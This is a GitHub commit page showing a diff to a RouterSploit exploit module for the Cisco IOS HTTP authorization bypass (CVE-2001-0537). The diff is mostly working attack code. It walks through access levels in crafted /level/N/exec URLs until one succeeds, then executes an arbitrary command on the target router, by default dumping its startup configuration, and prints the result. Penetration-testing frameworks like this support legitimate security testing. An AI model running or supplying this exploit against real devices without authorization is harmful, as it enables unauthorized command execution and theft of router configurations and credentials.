created corrections as suggested

created corrections as suggested (added mute , removed some parts, changed formatting etc )

created corrections as suggested
created corrections as suggested (added mute , removed some parts, changed formatting etc )
da066d62 · Renos Stoikos · GitHub · 0a300d27 · da066d62
Commit da066d62 authored Apr 18, 2017 by Renos Stoikos Committed by GitHub Apr 18, 2017
Show whitespace changes
Inline Side-by-side

Showing with 16 additions and 10 deletions

cisco_ios_http_authorization_bypass.py ...les/exploits/cisco/cisco_ios_http_authorization_bypass.py +16 -10

No files found.
--- a/routersploit/modules/exploits/cisco/cisco_ios_http_authorization_bypass.py
+++ b/routersploit/modules/exploits/cisco/cisco_ios_http_authorization_bypass.py
+import re
+
 from routersploit import (
    exploits,
    print_success,
    print_error,
    print_info,
    http_request,
+    mute,
    validators,
 )

@@ -21,7 +24,7 @@ class Exploit(exploits.Exploit):
                        'to bypass authentication and execute arbitrary commands, '
                        'when local authorization is being used, by specifying a high access level in the URL.',
        'authors': [
-            'Author', 'Renos Stoikos rstoikos[at]gmail.com'  # routesploit module
+            'Author', 'renos stoikos <rstoikos[at]gmail.com>'# routesploit module
        ],
        'references': [
            'http://www.cvedetails.com/cve/cve-2001-0537',
@@ -34,26 +37,29 @@ class Exploit(exploits.Exploit):
    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
    port = exploits.Option(80, 'Target port') # default port
    show_command = exploits.Option('show startup-config', 'Command to be executed e.g show startup-config')
+    access_level = None
    
+    @mute
    def check(self):
        for num in range(16, 100):
            url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port, num, self.show_command)
            response = http_request(method="GET", url=url)
            if response.status_code == 200:
+            	self.access_level = num
                return True  # target is vulnerable
-            elif response is None:
-                return False  # target is not vulnerable
        return False  # target is not vulnerable
            
    def run(self):
-        for num in range(16, 100):
-            url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port, num, self.show_command)
+        if self.check():
+            print_success("Target is vulnerable")
+            url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port, self.access_level, self.show_command)
            response = http_request(method="GET", url=url)
            if response is None:
-                return False  # target is not vulnerable
-            elif response.status_code == 200:
+                print_error("Could not execute command")  # target is not vulnerable
+                return
+            elif response.status_code == 200 and "Command was:  {}".format(self.show_command) in response.text:
                print_success("Exploit success! - executing command")
-                print_info(response.text)
-                break
+                print re.sub('<[^<]+?>', '', response.text)
            else:
-                print_error("Exploit failed - could not execute command for level", num)
+                print_error("Exploit failed - target seems to be not vulnerable")
+